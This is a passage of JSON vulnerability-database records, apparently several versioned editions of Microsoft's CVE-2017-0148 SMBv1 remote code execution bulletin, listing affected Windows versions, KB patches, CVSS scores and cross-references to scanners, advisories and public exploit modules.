2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T04:47:39", "differentElements": ["msAffectedSoftware"], "edition": 68}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the 
Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T06:50:12", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", 
"KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB3210721", "KB3205401", 
"KB4012216", "KB4013198", "KB3213986", "KB4012214", "KB4012217", "KB4013429", "KBMS16-110, 3187754", "KB3210720", "KB3177186", "KB4012212", "KB4012215", "KB4012598", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 
2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T06:50:12", "differentElements": ["msAffectedSoftware"], "edition": 69}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "3c8f710d7629e55dea40adfa20c8440d", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T08:45:23", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", 
"KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 
Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
